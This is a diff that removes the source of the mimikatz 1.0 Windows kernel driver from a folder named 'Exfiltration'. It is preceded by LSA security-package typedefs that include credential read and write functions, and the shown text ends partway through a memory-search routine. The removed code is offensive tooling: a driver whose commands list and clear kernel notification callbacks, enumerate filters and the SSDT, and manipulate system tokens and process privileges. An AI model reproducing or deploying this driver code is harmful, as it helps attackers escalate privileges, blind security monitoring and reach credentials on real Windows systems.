typedef NTSTATUS (WINAPI * PLSA_REGISTER_CALLBACK) (ULONG CallbackId, PLSA_CALLBACK_FUNCTION Callback);
typedef NTSTATUS (WINAPI * PLSA_UPDATE_PRIMARY_CREDENTIALS) (IN PSECPKG_PRIMARY_CRED PrimaryCredentials, IN OPTIONAL PSECPKG_SUPPLEMENTAL_CRED_ARRAY Credentials);
typedef VOID (WINAPI * PLSA_PROTECT_MEMORY) (IN PVOID Buffer, IN ULONG BufferSize);
typedef NTSTATUS (WINAPI * PLSA_OPEN_TOKEN_BY_LOGON_ID) (IN PLUID LogonId, OUT HANDLE *RetTokenHandle);
typedef NTSTATUS (WINAPI * PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN) (IN PUCHAR UserAuthData, IN ULONG UserAuthDataSize, IN PVOID Reserved, OUT PUCHAR * ExpandedAuthData, OUT PULONG ExpandedAuthDataSize);
#ifndef _ENCRYPTED_CREDENTIAL_DEFINED
#define _ENCRYPTED_CREDENTIAL_DEFINED
typedef struct _ENCRYPTED_CREDENTIALW {
CREDENTIALW Cred;
ULONG ClearCredentialBlobSize;
} ENCRYPTED_CREDENTIALW, *PENCRYPTED_CREDENTIALW;
#endif // _ENCRYPTED_CREDENTIAL_DEFINED
#define CREDP_FLAGS_IN_PROCESS 0x01 // Caller is in-process. Password data may be returned
#define CREDP_FLAGS_USE_MIDL_HEAP 0x02 // Allocated buffer should use MIDL_user_allocte
#define CREDP_FLAGS_DONT_CACHE_TI 0x04 // TargetInformation shouldn't be cached for CredGetTargetInfo
#define CREDP_FLAGS_CLEAR_PASSWORD 0x08 // Credential blob is passed in in-the-clear
#define CREDP_FLAGS_USER_ENCRYPTED_PASSWORD 0x10 // Credential blob is passed protected by RtlEncryptMemory
#define CREDP_FLAGS_TRUSTED_CALLER 0x20 // Caller is a trusted process (eg. logon process).
typedef enum _CredParsedUserNameType
{
parsedUsernameInvalid = 0,
parsedUsernameUpn,
parsedUsernameNt4Style,
parsedUsernameCertificate,
parsedUsernameNonQualified
} CredParsedUserNameType;
typedef NTSTATUS (NTAPI CredReadFn) (IN PLUID LogonId, IN ULONG CredFlags, IN LPWSTR TargetName, IN ULONG Type, IN ULONG Flags, OUT PENCRYPTED_CREDENTIALW *Credential);
typedef NTSTATUS (NTAPI CredReadDomainCredentialsFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PCREDENTIAL_TARGET_INFORMATIONW TargetInfo, IN ULONG Flags, OUT PULONG Count, OUT PENCRYPTED_CREDENTIALW **Credential);
typedef VOID (NTAPI CredFreeCredentialsFn) (IN ULONG Count, IN PENCRYPTED_CREDENTIALW *Credentials OPTIONAL);
typedef NTSTATUS (NTAPI CredWriteFn) (IN PLUID LogonId, IN ULONG CredFlags, IN PENCRYPTED_CREDENTIALW Credential, IN ULONG Flags);
typedef NTSTATUS (NTAPI CrediUnmarshalandDecodeStringFn)(IN LPWSTR MarshaledString, OUT LPBYTE *Blob, OUT ULONG *BlobSize, OUT BOOLEAN *IsFailureFatal);
typedef struct _LSA_SECPKG_FUNCTION_TABLE {
PLSA_CREATE_LOGON_SESSION CreateLogonSession;
PLSA_DELETE_LOGON_SESSION DeleteLogonSession;
PLSA_ADD_CREDENTIAL AddCredential;
PLSA_GET_CREDENTIALS GetCredentials;
PLSA_DELETE_CREDENTIAL DeleteCredential;
PLSA_ALLOCATE_LSA_HEAP AllocateLsaHeap;
PLSA_FREE_LSA_HEAP FreeLsaHeap;
PLSA_ALLOCATE_CLIENT_BUFFER AllocateClientBuffer;
PLSA_FREE_CLIENT_BUFFER FreeClientBuffer;
PLSA_COPY_TO_CLIENT_BUFFER CopyToClientBuffer;
PLSA_COPY_FROM_CLIENT_BUFFER CopyFromClientBuffer;
PLSA_IMPERSONATE_CLIENT ImpersonateClient;
PLSA_UNLOAD_PACKAGE UnloadPackage;
PLSA_DUPLICATE_HANDLE DuplicateHandle;
PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS SaveSupplementalCredentials;
PLSA_CREATE_THREAD CreateThread;
PLSA_GET_CLIENT_INFO GetClientInfo;
PLSA_REGISTER_NOTIFICATION RegisterNotification;
PLSA_CANCEL_NOTIFICATION CancelNotification;
PLSA_MAP_BUFFER MapBuffer;
PLSA_CREATE_TOKEN CreateToken;
PLSA_AUDIT_LOGON AuditLogon;
PLSA_CALL_PACKAGE CallPackage;
PLSA_FREE_LSA_HEAP FreeReturnBuffer;
PLSA_GET_CALL_INFO GetCallInfo;
PLSA_CALL_PACKAGEEX CallPackageEx;
PLSA_CREATE_SHARED_MEMORY CreateSharedMemory;
PLSA_ALLOCATE_SHARED_MEMORY AllocateSharedMemory;
PLSA_FREE_SHARED_MEMORY FreeSharedMemory;
PLSA_DELETE_SHARED_MEMORY DeleteSharedMemory;
PLSA_OPEN_SAM_USER OpenSamUser;
PLSA_GET_USER_CREDENTIALS GetUserCredentials;
PLSA_GET_USER_AUTH_DATA GetUserAuthData;
PLSA_CLOSE_SAM_USER CloseSamUser;
PLSA_CONVERT_AUTH_DATA_TO_TOKEN ConvertAuthDataToToken;
PLSA_CLIENT_CALLBACK ClientCallback;
PLSA_UPDATE_PRIMARY_CREDENTIALS UpdateCredentials;
PLSA_GET_AUTH_DATA_FOR_USER GetAuthDataForUser;
PLSA_CRACK_SINGLE_NAME CrackSingleName;
PLSA_AUDIT_ACCOUNT_LOGON AuditAccountLogon;
PLSA_CALL_PACKAGE_PASSTHROUGH CallPackagePassthrough;
CredReadFn *CrediRead;
CredReadDomainCredentialsFn *CrediReadDomainCredentials;
CredFreeCredentialsFn *CrediFreeCredentials;
PLSA_PROTECT_MEMORY LsaProtectMemory;
PLSA_PROTECT_MEMORY LsaUnprotectMemory;
PLSA_OPEN_TOKEN_BY_LOGON_ID OpenTokenByLogonId;
PLSA_EXPAND_AUTH_DATA_FOR_DOMAIN ExpandAuthDataForDomain;
PLSA_ALLOCATE_PRIVATE_HEAP AllocatePrivateHeap;
PLSA_FREE_PRIVATE_HEAP FreePrivateHeap;
PLSA_CREATE_TOKEN_EX CreateTokenEx;
CredWriteFn *CrediWrite;
CrediUnmarshalandDecodeStringFn *CrediUnmarshalandDecodeString;
} LSA_SECPKG_FUNCTION_TABLE, *PLSA_SECPKG_FUNCTION_TABLE;

1
Exfiltration/mimikatz-1.0/driver/MAKEFILE
View File

@ -1 +0,0 @@
!INCLUDE $(NTMAKEENV)\makefile.def

32
Exfiltration/mimikatz-1.0/driver/MSCV-GlobalSign.cer
View File

@ -1,32 +0,0 @@
-----BEGIN CERTIFICATE-----
MIIFfzCCA2egAwIBAgIKYQt/awAAAAAAGTANBgkqhkiG9w0BAQUFADB/MQswCQYD
VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe
MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSkwJwYDVQQDEyBNaWNyb3Nv
ZnQgQ29kZSBWZXJpZmljYXRpb24gUm9vdDAeFw0wNjA1MjMxNzAwNTFaFw0xNjA1
MjMxNzEwNTFaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52
LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxTaWduIFJvb3Qg
Q0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZjc6j40+Kfvvx
i4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavpxy0Sy6scTHAH
oT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp1Wrjsok6Vjk4
bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdGsnUOhugZitVt
bNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJU26Qzns3dLlw
R5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N89iFo7+ryUp9/
k5DPAgMBAAGjggEjMIIBHzARBgNVHSAECjAIMAYGBFUdIAAwNgYJKwYBBAGCNxUH
BCkwJwYfKwYBBAGCNxUIjeDRiU6E15zDB4amhvscj9O/phUBGQIBbgIBADALBgNV
HQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUYHtmGkUNl8qJUC99
BM00qP/8/UswHQYJKwYBBAGCNxQCBBAeDgBDAHIAbwBzAHMAQwBBMB8GA1UdIwQY
MBaAFGL7CiFbf0NuEdoJVFBr9dKWcfGeMFUGA1UdHwROMEwwSqBIoEaGRGh0dHA6
Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY3Jvc29mdENv
ZGVWZXJpZlJvb3QuY3JsMA0GCSqGSIb3DQEBBQUAA4ICAQATxWxeB388V/+bMV8/
vZVUJcZ5+SwxA01kaUtW2VuXb3zz8NAkZXU4Y5gTcBYT96cB8cYj4IWGbAvwgJRa
deh85B6StHO/wbOnsAvTGITLzAmjXJxPPrA6nC0bxATvlzeWb+Xsuqxqs9TiPN+L
JeesvGJFMd2kCnLkG/h4QwHMujkU3l2Qrthaz17KRoFRM9WmDlhn09hmWIgWm+6x
GsqtkROEIdqabiDv2gB0KLrJX/NNXcPaJWklVOpEvMObKTMc1jyWH4eBxVPXKicz
1C4ZfAhYbdtOGZmp6l/zmp2MUTpaXL0vqQg1m1Sn2zUaUhYzNDqjgARq/bSDjK2Q
zww6ZZbsM04YJrhJu+uBkv8TTTJLI8cz57ZxaxX2nIDmvLdsvkHVAzpxMxUAUHQ7
Dl35lqrtkD6rE0yAmSa8OKXrAjaJHbYgvoOrEPgZntdjedSusS9hNvlKS6gzxw5y
QfnxsZB+rkbv3jl7daBBFFkEHUK8R4i4Ew4F+h3wgI3/cMZ32EvcRg4jGnLVv97+
qq5pWDz8XEbk1YGai25lWXcaMqWQprZkk2T9B1PJoN4orSpsxjjRgc6Y9UAZ6SwX
Q6QmX9NEMFPkHQK6pAovFt16YCdSQrutmDcol+S40nkR4xCMSNUwXQoMUt71iOqN
Gi1nyfSAFIS3hQzRZiilxm8kYQ==
-----END CERTIFICATE-----

9
Exfiltration/mimikatz-1.0/driver/SOURCES
View File

@ -1,9 +0,0 @@
TARGETNAME=mimikatz
TARGETPATH=OBJ
TARGETTYPE=DRIVER
SOURCES=mimikatz.c \
mod_memory.c \
processes.c minifilters.c fsfilters.c modules.c ssdt.c \
notify_process.c notify_thread.c notify_image.c notify_reg.c notify_object.c
TARGETLIBS= $(TARGETLIBS) $(IFSKIT_LIB_PATH)\fltmgr.lib $(BASEDIR)\lib\wlh\*\aux_klib.lib $(DDK_LIB_PATH)\ntstrsafe.lib

35
Exfiltration/mimikatz-1.0/driver/fsfilters.c
View File

@ -1,35 +0,0 @@
#include "fsfilters.h"
NTSTATUS kFiltersList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
NTSTATUS status;
ULONG ActualNumberDriverObjects = 0;
PDRIVER_OBJECT * DriverObjectList = NULL;
ULONG i;
*ppszDestEnd = pszDest;
*pcbRemaining= cbDest;
IoEnumerateRegisteredFiltersList(NULL, 0, &ActualNumberDriverObjects);
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kFiltersList - ActualNumberDriverObjects : %u\n\n", ActualNumberDriverObjects);
if(NT_SUCCESS(status))
{
if(ActualNumberDriverObjects > 0)
{
DriverObjectList = ExAllocatePoolWithTag(NonPagedPool, sizeof(PDRIVER_OBJECT) * ActualNumberDriverObjects, POOL_TAG);
if(DriverObjectList != NULL)
{
IoEnumerateRegisteredFiltersList(DriverObjectList, sizeof(PDRIVER_OBJECT) * ActualNumberDriverObjects, &ActualNumberDriverObjects);
for(i = 0; (i < ActualNumberDriverObjects) && NT_SUCCESS(status); i++)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] %wZ\n",i , &(DriverObjectList[i]->DriverName));
//DbgPrint("[%.2u] %wZ\n",i , &(DriverObjectList[i]->DriverName));
ObDereferenceObject(DriverObjectList[i]);
}
ExFreePoolWithTag(DriverObjectList, POOL_TAG);
}
}
}
return status;
}

5
Exfiltration/mimikatz-1.0/driver/fsfilters.h
View File

@ -1,5 +0,0 @@
#pragma once
#include <ntifs.h>
#include "k_types.h"
NTSTATUS kFiltersList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);

49
Exfiltration/mimikatz-1.0/driver/k_types.h
View File

@ -1,49 +0,0 @@
#pragma once
#include <ntddk.h>
#include <ntstrsafe.h>
#define MIN(a, b) (((a) < (b)) ? (a) : (b))
#define MAX(a, b) (((a) > (b)) ? (a) : (b))
#ifndef KIWI_NameToFunc
#define KIWI_NameToFunc(Name, Function) if(taillFunc == sizeof(Name) - sizeof(WCHAR)) if(RtlCompareMemory(Name, buffer, taillFunc) == taillFunc) {*destFunc = Function; return STATUS_SUCCESS;}
#endif
#ifndef KIWI_mask3bits
#define KIWI_mask3bits(addr) (((ULONG_PTR) (addr)) & ~7)
#endif
#define POOL_TAG 'iwik'
#define INDEX_UNK 0
#define INDEX_XP 1
#define INDEX_2K3 2
#define INDEX_VISTA 3
#define INDEX_2K8 4
#define INDEX_7 5
#define INDEX_2K8R2 6
#define INDEX_8 7
#define MAX_OS_LEN 8
#ifdef _M_IX86
#define EX_FAST_REF_MASK 0x07
#else
#define EX_FAST_REF_MASK 0x0f
#endif
typedef NTSTATUS (* ptrLocalFunction) (LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
ULONG INDEX_OS;
PDRIVER_OBJECT moi;
typedef struct _SERVICE_DESCRIPTOR_TABLE {
#ifdef _M_IX86
PVOID *ServiceTable;
#else
LONG *OffsetToService;
#endif
PULONG CounterTable;
ULONG TableSize;
PUCHAR ArgumentTable;
} SERVICE_DESCRIPTOR_TABLE, *PSERVICE_DESCRIPTOR_TABLE;

193
Exfiltration/mimikatz-1.0/driver/mimikatz.c
View File

@ -1,193 +0,0 @@
#include "mimikatz.h"
ptrLocalFunction maFunc = NULL;
NTSTATUS UnSupported(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
return STATUS_NOT_SUPPORTED;
}
NTSTATUS Write(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
NTSTATUS status = STATUS_INVALID_PARAMETER;
PIO_STACK_LOCATION pIoStackIrp = NULL;
PWSTR params;
size_t tailleParams;
pIoStackIrp = IoGetCurrentIrpStackLocation(Irp);
if(Irp->AssociatedIrp.SystemBuffer && pIoStackIrp)
{
status = getLocalFuncFromName((LPWSTR) Irp->AssociatedIrp.SystemBuffer, pIoStackIrp->Parameters.Write.Length, &params, &tailleParams, &maFunc);
if(NT_SUCCESS(status))
{
Irp->IoStatus.Information = pIoStackIrp->Parameters.Write.Length;
}
}
IoCompleteRequest(Irp, IO_NO_INCREMENT);
Irp->IoStatus.Status = status;
return status;
}
NTSTATUS Read(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
NTSTATUS status = STATUS_INVALID_HANDLE;
PIO_STACK_LOCATION pIoStackIrp = NULL;
LPWSTR pszDestEnd;
size_t pcbRemaining;
pIoStackIrp = IoGetCurrentIrpStackLocation(Irp);
if(Irp->AssociatedIrp.SystemBuffer && pIoStackIrp)
{
if(maFunc)
{
status = maFunc((LPWSTR) Irp->AssociatedIrp.SystemBuffer, pIoStackIrp->Parameters.Read.Length, &pszDestEnd, &pcbRemaining);
if(NT_SUCCESS(status))
{
Irp->IoStatus.Information = pIoStackIrp->Parameters.Read.Length - pcbRemaining;
}
}
else
{
status = STATUS_PROCEDURE_NOT_FOUND;
}
}
IoCompleteRequest(Irp, IO_NO_INCREMENT);
Irp->IoStatus.Status = status;
return status;
}
void DriverUnload(IN PDRIVER_OBJECT theDriverObject)
{
UNICODE_STRING UStrDosDeviceName;
RtlInitUnicodeString(&UStrDosDeviceName, L"\\DosDevices\\mimikatz");
IoDeleteSymbolicLink(&UStrDosDeviceName);
IoDeleteDevice(theDriverObject->DeviceObject);
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath)
{
NTSTATUS status;
UNICODE_STRING UStrDriverName, UStrDosDeviceName;
PDEVICE_OBJECT pDeviceObject = NULL;
ULONG i;
moi = theDriverObject;
RtlInitUnicodeString(&UStrDriverName, L"\\Device\\mimikatz");
status = IoCreateDevice(theDriverObject, 0, &UStrDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject);
if(NT_SUCCESS(status))
{
INDEX_OS = getWindowsIndex();
for(i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
theDriverObject->MajorFunction[i] = UnSupported;
theDriverObject->MajorFunction[IRP_MJ_READ] = Read;
theDriverObject->MajorFunction[IRP_MJ_WRITE] = Write;
theDriverObject->DriverUnload = DriverUnload;
pDeviceObject->Flags |= DO_BUFFERED_IO;
pDeviceObject->Flags &= ~DO_DEVICE_INITIALIZING;
RtlInitUnicodeString(&UStrDosDeviceName, L"\\DosDevices\\mimikatz");
IoCreateSymbolicLink(&UStrDosDeviceName, &UStrDriverName);
}
return status;
}
ULONG getWindowsIndex()
{
switch(*NtBuildNumber)
{
case 2600:
return INDEX_XP;
break;
case 3790:
return INDEX_2K3;
break;
case 6000:
case 6001:
return INDEX_VISTA;
case 6002:
return INDEX_2K8;
break;
case 7600:
case 7601:
return INDEX_7;
break;
case 8102:
case 8250:
case 9200:
return INDEX_8;
break;
default:
return 0;
}
}
NTSTATUS getLocalFuncFromName(PWSTR buffer, size_t taille, PWSTR *params, size_t * tailleParams, ptrLocalFunction * destFunc)
{
NTSTATUS status;
size_t tailleChaine;
ULONG i;
ULONG taillFunc;
status = RtlStringCbLengthW(buffer, taille, &tailleChaine);
if(NT_SUCCESS(status))
{
for(i = 0; (i < tailleChaine / sizeof(WCHAR)) && (buffer[i] != L' '); i++);
if( (i+1) < (tailleChaine / sizeof(WCHAR)))
{
*params = buffer + (i+1);
*tailleParams = (tailleChaine / sizeof(WCHAR)) - (i+1); // avoir !!!
DbgPrint("%u", *tailleParams);
}
else
{
*params = NULL;
*tailleParams = 0;
}
*destFunc = NULL;
taillFunc = i*sizeof(WCHAR);
KIWI_NameToFunc(L"ping", kPing);
if(INDEX_OS)
{
KIWI_NameToFunc(L"ssdt", kSSDT);
KIWI_NameToFunc(L"listModules", kModulesList);
KIWI_NameToFunc(L"listFilters", kFiltersList);
KIWI_NameToFunc(L"listMinifilters", kMiniFiltersList);
KIWI_NameToFunc(L"listNotifProcesses", kListNotifyProcesses);
KIWI_NameToFunc(L"listNotifThreads", kListNotifyThreads);
KIWI_NameToFunc(L"listNotifImages", kListNotifyImages);
KIWI_NameToFunc(L"listNotifRegistry", kListNotifyRegistry);
KIWI_NameToFunc(L"listNotifObjects", kListNotifyObjects);
KIWI_NameToFunc(L"clearNotifObjects", kClearNotifyObjects);
KIWI_NameToFunc(L"listProcesses", listProcesses);
KIWI_NameToFunc(L"sysToken", sysToken);
KIWI_NameToFunc(L"privProcesses", privProcesses);
}
}
return status;
}
NTSTATUS kPing(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
return RtlStringCbPrintfExW(pszDest, cbDest, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"Pong (from ring 0 :)\n");
}

26
Exfiltration/mimikatz-1.0/driver/mimikatz.h
View File

@ -1,26 +0,0 @@
#pragma once
#include "minifilters.h"
#include "fsfilters.h"
#include "modules.h"
#include "processes.h"
#include "ssdt.h"
#include "notify.h"
#include "k_types.h"
#include <ntddk.h>
extern PSHORT NtBuildNumber;
ULONG getWindowsIndex();
DRIVER_INITIALIZE DriverEntry;
DRIVER_UNLOAD DriverUnload;
DRIVER_DISPATCH UnSupported;
__drv_dispatchType(IRP_MJ_READ) DRIVER_DISPATCH Read;
__drv_dispatchType(IRP_MJ_WRITE) DRIVER_DISPATCH Write;
NTSTATUS getLocalFuncFromName(PWSTR buffer, size_t taille, PWSTR *params, size_t * tailleParams, ptrLocalFunction * destFunc);
NTSTATUS kPing(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);

193
Exfiltration/mimikatz-1.0/driver/minifilters.c
View File

@ -1,193 +0,0 @@
#include "minifilters.h"
const ULONG MF_OffSetTable[MAX_OS_LEN][MAX_MF_LEN] =
{
/* INDEX_MF_CALLBACK_OFF, INDEX_MF_CALLBACK_PRE_OFF, INDEX_MF_CALLBACK_POST_OFF, INDEX_MF_VOLUME_NAME_OFF */
#ifdef _M_IX86
/* INDEX_UNK */ {0x0000, 0x0000, 0x0000, 0x0000},
/* INDEX_XP */ {0x007c, 0x000c, 0x0010, 0x002c},
/* INDEX_2K3 */ {0x007c, 0x000c, 0x0010, 0x002c},
/* INDEX_VISTA */ {0x004c, 0x000c, 0x0010, 0x0030},
/* INDEX_2K8 */ {0x004c, 0x000c, 0x0010, 0x0030},
/* INDEX_7 */ {0x004c, 0x000c, 0x0010, 0x0030},
/* INDEX_2K8R2 */ {0x0000, 0x0000, 0x0000, 0x0000},/* n'existe pas !*/
/* INDEX_8 */ {0x004c, 0x000c, 0x0010, 0x0030}
#else
/* INDEX_UNK */ {0x0000, 0x0000, 0x0000, 0x0000},
/* INDEX_XP */ {0x0000, 0x0000, 0x0000, 0x0000},/* n'existe pas, XP x64 est 2003 x64 */
/* INDEX_2K3 */ {0x00e8, 0x0018, 0x0020, 0x0048},
/* INDEX_VISTA */ {0x0090, 0x0018, 0x0020, 0x0050},
/* INDEX_2K8 */ {0x0090, 0x0018, 0x0020, 0x0050},
/* INDEX_7 */ {0x0090, 0x0018, 0x0020, 0x0050},
/* INDEX_2K8R2 */ {0x0090, 0x0018, 0x0020, 0x0050},
/* INDEX_8 */ {0x0090, 0x0018, 0x0020, 0x0050}
#endif
};
const WCHAR *irpToName[] = {
L"CREATE",
L"CREATE_NAMED_PIPE",
L"CLOSE",
L"READ",
L"WRITE",
L"QUERY_INFORMATION",
L"SET_INFORMATION",
L"QUERY_EA",
L"SET_EA",
L"FLUSH_BUFFERS",
L"QUERY_VOLUME_INFORMATION",
L"SET_VOLUME_INFORMATION",
L"DIRECTORY_CONTROL",
L"FILE_SYSTEM_CONTROL",
L"DEVICE_CONTROL",
L"INTERNAL_DEVICE_CONTROL",
L"SHUTDOWN",
L"LOCK_CONTROL",
L"CLEANUP",
L"CREATE_MAILSLOT",
L"QUERY_SECURITY",
L"SET_SECURITY",
L"POWER",
L"SYSTEM_CONTROL",
L"DEVICE_CHANGE",
L"QUERY_QUOTA",
L"SET_QUOTA",
L"PNP",
};
NTSTATUS kMiniFiltersList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
{
NTSTATUS status;
ULONG i, j, k;
ULONG NumberFiltersReturned = 0;
PFLT_FILTER *FilterList = NULL;
ULONG BytesReturned = 0;
PFILTER_FULL_INFORMATION myFilterFullInformation = NULL;
PFLT_INSTANCE *InstanceList = NULL;
ULONG NumberInstancesReturned = 0;
PFLT_VOLUME RetVolume = NULL;
PVOID monCallBack, preCallBack, postCallBack;
*ppszDestEnd = pszDest;
*pcbRemaining= cbDest;
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kMiniFiltersList\n\n");
if(NT_SUCCESS(status))
{
status = FltEnumerateFilters(NULL, 0, &NumberFiltersReturned);
if((status == STATUS_BUFFER_TOO_SMALL) && (NumberFiltersReturned > 0))
{
FilterList = ExAllocatePoolWithTag(NonPagedPool, sizeof(PFLT_FILTER) * NumberFiltersReturned, POOL_TAG);
if(FilterList != NULL)
{
status = FltEnumerateFilters(FilterList, sizeof(PFLT_FILTER) * NumberFiltersReturned, &NumberFiltersReturned);
for(i = 0; (i < NumberFiltersReturned) && NT_SUCCESS(status); i++)
{
status = FltGetFilterInformation(FilterList[i], FilterFullInformation, NULL, 0, &BytesReturned);
if((status == STATUS_BUFFER_TOO_SMALL) && (BytesReturned > 0))
{
myFilterFullInformation = ExAllocatePoolWithTag(NonPagedPool, BytesReturned, POOL_TAG);
if(myFilterFullInformation != NULL)
{
status = FltGetFilterInformation(FilterList[i], FilterFullInformation, myFilterFullInformation, BytesReturned, &BytesReturned);
if(NT_SUCCESS(status))
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
L"%*.*ws\n",
myFilterFullInformation->FilterNameLength/sizeof(WCHAR), myFilterFullInformation->FilterNameLength/sizeof(WCHAR),
myFilterFullInformation->FilterNameBuffer
);
if(NT_SUCCESS(status))
{
status = FltEnumerateInstances(NULL, FilterList[i], NULL, 0, &NumberInstancesReturned);
if((status == STATUS_BUFFER_TOO_SMALL) && (NumberInstancesReturned > 0))
{
InstanceList = ExAllocatePoolWithTag(NonPagedPool, sizeof(PFLT_INSTANCE) * NumberInstancesReturned, POOL_TAG);
if(InstanceList != NULL)
{
status = FltEnumerateInstances(NULL, FilterList[i], InstanceList, NumberInstancesReturned, &NumberInstancesReturned);
for(j = 0; (j < NumberInstancesReturned) && NT_SUCCESS(status); j++)
{
/*
http://msdn.microsoft.com/en-us/library/windows/hardware/ff541499%28v=VS.85%29.aspx
* InstanceName
* Altitude
* VolumeName
- FilterName
*/
if(NT_SUCCESS(FltGetVolumeFromInstance(InstanceList[j], &RetVolume)))
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
L" Instance %u @ %wZ\n",
j,
(PUNICODE_STRING) (((ULONG_PTR) RetVolume) + MF_OffSetTable[INDEX_OS][INDEX_MF_VOLUME_NAME_OFF])
);
FltObjectDereference (RetVolume);
}
else
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
L" Instance %u\n",
j
);
}
for(k = 0x16; (k < 0x32) && NT_SUCCESS(status); k++)
{
monCallBack = (PVOID) *(PULONG_PTR) (( ((ULONG_PTR) InstanceList[j] )+ MF_OffSetTable[INDEX_OS][INDEX_MF_CALLBACK_OFF]) + sizeof(PVOID)*k);
if(monCallBack != NULL)
{
preCallBack = (PVOID) *(PULONG_PTR) (((ULONG_PTR) monCallBack) + MF_OffSetTable[INDEX_OS][INDEX_MF_CALLBACK_PRE_OFF]);
postCallBack = (PVOID) *(PULONG_PTR) (((ULONG_PTR) monCallBack) + MF_OffSetTable[INDEX_OS][INDEX_MF_CALLBACK_POST_OFF]);
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
L" [0x%2x %-24ws] ",
k,
irpToName[k - 0x16]
);
if(NT_SUCCESS(status))
{
status = getModuleFromAddr((ULONG_PTR) preCallBack, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L" / ");
if(NT_SUCCESS(status))
{
status = getModuleFromAddr((ULONG_PTR) postCallBack, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
{
status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n");
}
}
}
}
}
}
FltObjectDereference (InstanceList[j]);
}
ExFreePoolWithTag(InstanceList, POOL_TAG);
}
}
}
}
ExFreePoolWithTag(myFilterFullInformation, POOL_TAG);
}
}
FltObjectDereference (FilterList[i]);
}
ExFreePoolWithTag(FilterList, POOL_TAG);
}
}
}
return status;
}

12
Exfiltration/mimikatz-1.0/driver/minifilters.h
View File

@ -1,12 +0,0 @@
#pragma once
#include <fltkernel.h>
#include "k_types.h"
#include "modules.h"
#define INDEX_MF_CALLBACK_OFF 0
#define INDEX_MF_CALLBACK_PRE_OFF 1
#define INDEX_MF_CALLBACK_POST_OFF 2
#define INDEX_MF_VOLUME_NAME_OFF 3
#define MAX_MF_LEN 4
NTSTATUS kMiniFiltersList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);

32
Exfiltration/mimikatz-1.0/driver/mod_memory.c
View File

@ -1,32 +0,0 @@
#include "mod_memory.h"
NTSTATUS searchMemory(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, PUCHAR *addressePattern, SIZE_T longueur)
{
for(*addressePattern = adresseBase; (adresseMaxMin > adresseBase) ? (*addressePattern <= adresseMaxMin) : (*addressePattern >= adresseMaxMin); *addressePattern += (adresseMaxMin > adresseBase) ? 1 : -1)
{
if(RtlCompareMemory(pattern, *addressePattern, longueur) == longueur)
{
return STATUS_SUCCESS;
}
}
*addressePattern = NULL;
return STATUS_NOT_FOUND;
}
NTSTATUS genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, SIZE_T longueur, LONG offsetTo)
{
